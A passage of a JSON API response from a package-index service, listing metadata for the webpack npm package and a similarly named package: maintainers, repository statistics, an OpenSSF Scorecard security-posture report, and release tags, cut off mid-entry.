cosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4.17.1/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4.17.1/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4.17.1/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4.17.1/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4.17.1/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-4.17.1/codemeta","maintainers":[{"uuid":"zhufengnodejs","login":"zhufengnodejs","name":null,"email":"zhufengnodejs@126.com","url":null,"packages_count":12,"html_url":"https://www.npmjs.com/~zhufengnodejs","role":null,"created_at":"2022-11-15T10:21:02.095Z","updated_at":"2022-11-15T10:21:02.095Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/zhufengnodejs/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2566284,"name":"webpack","ecosystem":"npm","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":887,"first_release_published_at":"2012-03-11T21:00:02.365Z","latest_release_published_at":"2026-09-01T20:02:13.900Z","latest_release_number":"5.110.3","last_synced_at":"2026-09-02T18:20:23.669Z","created_at":"2022-04-10T03:37:21.748Z","updated_at":"2026-09-03T03:18:26.046Z","registry_url":"https://www.npmjs.com/package/webpack","install_command":"npm install webpack","documentation_url":null,"metadata":{"funding":{"url":"https://opencollective.com/webpack","type":"opencollective"},"dist-tags":{"legacy":"1.15.0","webpack-2":"2.7.0","webpack-3":"3.12.0","next":"5.0.0-rc.6","webpack-4":"4.47.0","latest":"5.110.3"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31